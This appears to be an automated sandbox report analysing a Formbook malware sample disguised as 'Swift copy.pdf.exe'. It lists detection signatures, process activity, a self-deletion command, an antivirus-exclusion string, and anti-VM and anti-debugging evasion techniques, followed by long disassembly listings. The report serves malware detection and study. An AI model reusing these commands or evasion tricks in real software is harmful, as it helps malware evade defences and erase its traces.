          Source: 5.2.Swift copy.pdf.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.Swift copy.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Swift copy.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@10/7
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Swift copy.pdf.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:724:120:WilError_01
          Source: Swift copy.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: Swift copy.pdf.exeVirustotal: Detection: 30%
          Source: Swift copy.pdf.exeReversingLabs: Detection: 20%
          Source: unknownProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe 'C:\Users\user\Desktop\Swift copy.pdf.exe'
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exe
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Swift copy.pdf.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exe
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeProcess created: C:\Users\user\Desktop\Swift copy.pdf.exe C:\Users\user\Desktop\Swift copy.pdf.exe
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Swift copy.pdf.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: C:\Users\user\Desktop\Swift copy.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Swift copy.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Swift copy.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: Swift copy.pdf.exe, 00000005.00000002.389930422.0000000000FF0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.376832719.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Swift copy.pdf.exe, 00000005.00000002.389961809.0000000001070000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Swift copy.pdf.exe, 00000005.00000002.389961809.0000000001070000.00000040.00000001.sdmp, cscript.exe
          Source: Binary string: cscript.pdb source: Swift copy.pdf.exe, 00000005.00000002.389930422.0000000000FF0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.376832719.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 0_2_0258308A push ss; retf
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 0_2_02582AC6 push es; ret
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 5_2_0040C296 pushfd ; retf
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 5_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 5_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 5_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 5_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 5_2_004154CC push ss; iretd
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 5_2_0040AFE9 push cs; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0498D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0312B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0312B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0312B3FB push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0311C296 pushfd ; retf
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0311AFE9 push cs; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0312B45C push eax; ret
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_031254CC push ss; iretd
          Source: initial sample | Static PE information: section name: .text entropy: 7.95048824536

          Hooking and other Techniques for Hiding and Protection:

          Icon mismatch, binary includes an icon from a different legit application in order to fool users
          Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: icon (5001).png
          Uses an obfuscated file name to hide its real file extension (double extension)
          Source: Possible double extension: pdf.exe | Static PE information: Swift copy.pdf.exe
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Process information set: NOOPENFILEERRORBOX (39 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (5 identical entries)
          Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Swift copy.pdf.exe PID: 6628, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 00000000031185E4 second address: 00000000031185EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 000000000311896E second address: 0000000003118974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 5_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe TID: 6632 | Thread sleep time: -102883s >= -30000s
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe TID: 6652 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2524 | Thread sleep time: -35000s >= -30000s
          Source: C:\Windows\SysWOW64\cscript.exe TID: 6780 | Thread sleep time: -36000s >= -30000s
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Thread delayed: delay time: 102883
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000007.00000000.373852974.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000007.00000000.373819513.00000000083EB000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000007.00000000.373679366.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000002.606371070.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000007.00000000.370918951.00000000063F6000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: cscript.exe, 0000000A.00000002.591526613.00000000002EC000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp | Binary or memory string: VMWARE
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000007.00000002.606371070.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 00000007.00000000.373819513.00000000083EB000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: Swift copy.pdf.exe, 00000000.00000002.351677909.00000000027E5000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000007.00000000.373679366.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000007.00000002.606371070.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000007.00000000.373679366.00000000082E2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000007.00000000.373852974.0000000008430000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000007.00000002.591935318.000000000095C000.00000004.00000020.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: explorer.exe, 00000007.00000002.606371070.0000000005D50000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\cscript.exe | Process queried: DebugPort
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 5_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\Swift copy.pdf.exe | Code function: 5_2_00409B10 LdrLoadDll,
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0494849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04939080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049B3884 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0496F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0496F0BF mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049620A0 mov eax, dword ptr fs:[00000030h] (6 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049CB8D0 mov eax, dword ptr fs:[00000030h] (4 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049B6CF0 mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04A08CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049B7016 mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049B6C0A mov eax, dword ptr fs:[00000030h] (4 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049F1C06 mov eax, dword ptr fs:[00000030h] (14 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04A0740D mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04A04015 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0496BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0496002D mov eax, dword ptr fs:[00000030h] (5 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0494B02A mov eax, dword ptr fs:[00000030h] (4 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04950050 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049CC450 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04A01074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0496A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0495746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04962990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04A005AC mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0496FD9B mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0496A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0495C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04962581 mov eax, dword ptr fs:[00000030h] (4 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04932D8A mov eax, dword ptr fs:[00000030h] (5 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04961DB5 mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049B51BE mov eax, dword ptr fs:[00000030h] (4 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049661A0 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049B6DC9 mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049B6DC9 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0493B1E1 mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0494D5E0 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04939100 mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04A08D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04943D34 mov eax, dword ptr fs:[00000030h] (13 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0493AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0496513A mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049BA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04964D3B mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04954120 mov eax, dword ptr fs:[00000030h] (4 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04954120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04957D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0495B944 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04973D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0493B171 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0495C577 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0493C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0496D294 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_04A00EA5 mov eax, dword ptr fs:[00000030h] (3 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049CFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0494AAB0 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_0496FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe | Code function: 10_2_049352A5 mov eax, dword ptr fs:[00000030h] (2 identical entries)
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049352A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049B46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04978EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049636CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049EFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04962AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049616E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04A08ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049476E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04935210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04935210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04935210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04935210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04953A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0496A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04968E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04948A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_049EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0493E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04974A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04974A2C mov eax, dword ptr fs:[00000030h]
